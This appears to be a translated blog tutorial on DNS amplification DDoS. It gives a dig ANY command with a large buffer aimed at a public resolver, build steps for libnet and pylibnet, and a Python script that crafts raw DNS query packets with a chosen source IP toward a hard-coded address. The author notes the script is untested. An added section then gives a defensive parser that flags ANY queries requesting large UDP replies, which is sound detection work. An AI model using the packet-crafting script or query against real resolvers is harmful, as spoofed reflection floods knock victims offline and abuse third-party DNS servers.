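1 Preface
One DDoS technique is the DNS large-packet attack, commonly known as DNS amplification. The principle: construct DNS request packets and send them to public DNS servers, choosing queries whose responses carry a large amount of data (for example: dig ANY isc.org +notcp +bufsize=4096 @8.8.8.8).
2 Base environment setup
2.1 Install libnet:
Download: http://sourceforge.net/projects/libnet-dev/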
# tar zxvf libnet-1.2-rc3.tar.gz
# cd libnet-1.2-rc3
# ./configure
# make
# make install
2.2 Install pylibnet:
Download: http://sourceforge.net/projects/pylibnet/
# tar zxvf pylibnet-3.0-beta-rc1.tar.gz
# cd pylibnet-3.0-beta-rc1
# python setup.py install
3 Writing the test
The code is as follows:
#!/usr/bin/python
import struct
import sys
import libnet
from libnet.constants import *

l = libnet.context(
    RAW4,    # The injection type
    'eth0'   # Device name
)
dst_ip = l.name2addr4(
    '223.236.117.2',  # Let's get the network byte ordered representation of this IP
    DONT_RESOLVE
)
src_ip = l.name2addr4(
    '10.0.0.31',  # Let's get the network byte ordered representation of this IP
    DONT_RESOLVE
)
# query: length-prefixed labels for www.sina.com, root label, QTYPE=A, QCLASS=IN
query = struct.pack('b3sb4sb3sbbbbb', 3, 'www', 4, 'sina', 3, 'com', 0, 0, 1, 0, 1)
dns_tag = l.build_dnsv4(
    h_len=12,
    id=2,
    flags=256,
    num_q=1,
    num_anws_rr=0,
    num_auth_rr=0,
    num_addi_rr=0,
    payload=query,
)
udp_tag = l.build_udp(
    dp=53,  # destination port
    sum=0,
    len=38,
)
# Now onto the IPv4 header
#ipv4_tag = l.autobuild_ipv4(
ipv4_tag = l.build_ipv4(
    # len=IPV4_H + UDP_H + 12,  # IPV4 packet length
    prot=IPPROTO_UDP,  # Protocol type
    dst=dst_ip,
    src=src_ip,
)
# send packet
l.write()
I have not tested this yet; interested readers can refer to the original post: http://bbs.chinaunix.net/forum.php?mod=viewthread&tid=1601787&ordertype=1
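For the resolver side, the following added example (not part of the original post) parses the same DNS query wire format and flags the pattern from the dig command in the preface: an ANY question that advertises a large EDNS0 UDP payload size. The function names and the 1232-byte threshold are assumptions chosen for illustration, and the sample queries are constructed in the code, not captured traffic.

```python
import struct

QTYPE_ANY, TYPE_OPT = 255, 41
MAX_EDNS = 1232  # assumed policy threshold, not from the page

def build_query(name, qtype, edns_size=None):
    """Constructed sample input: one-question query, optional EDNS0 OPT record."""
    qname = b"".join(bytes([len(p)]) + p.encode("ascii") for p in name.split(".")) + b"\x00"
    msg = struct.pack("!HHHHHH", 2, 0x0100, 1, 0, 0, 1 if edns_size else 0)
    msg += qname + struct.pack("!HH", qtype, 1)          # QTYPE, QCLASS=IN
    if edns_size:                                        # root name, OPT, size, ttl, rdlen
        msg += b"\x00" + struct.pack("!HHIH", TYPE_OPT, edns_size, 0, 0)
    return msg

def parse_query(msg):
    """Return (qname, qtype, advertised UDP payload size) for a DNS query."""
    _id, flags, qd, _an, _ns, ar = struct.unpack_from("!HHHHHH", msg, 0)
    if flags & 0x8000 or qd != 1:
        raise ValueError("not a single-question query")
    pos, labels = 12, []
    while True:
        n = msg[pos]                  # IndexError on truncated input
        pos += 1
        if n == 0:
            break
        if n > 63:
            raise ValueError("pointer or invalid label in question")
        labels.append(msg[pos:pos + n].decode("ascii", "replace"))
        pos += n
    qtype, _qclass = struct.unpack_from("!HH", msg, pos)
    pos += 4
    size = 512                        # classic limit when no EDNS0 is present
    if ar and msg[pos:pos + 1] == b"\x00":
        rtype, rclass = struct.unpack_from("!HH", msg, pos + 1)
        if rtype == TYPE_OPT:
            size = rclass             # OPT reuses CLASS as UDP payload size
    return ".".join(labels), qtype, size

def is_amplification_probe(msg, max_size=MAX_EDNS):
    """Flag ANY queries that ask for large UDP answers; malformed input is not flagged."""
    try:
        _name, qtype, size = parse_query(msg)
    except (ValueError, IndexError, struct.error):
        return False
    return qtype == QTYPE_ANY and size > max_size

if __name__ == "__main__":
    for q in (build_query("www.sina.com", 1), build_query("isc.org", QTYPE_ANY, 4096)):
        print(parse_query(q), is_amplification_probe(q))
```

A resolver operator can pair a check like this with response rate limiting and with refusing or minimising ANY answers over UDP, so that a spoofed source address does not receive a large reply.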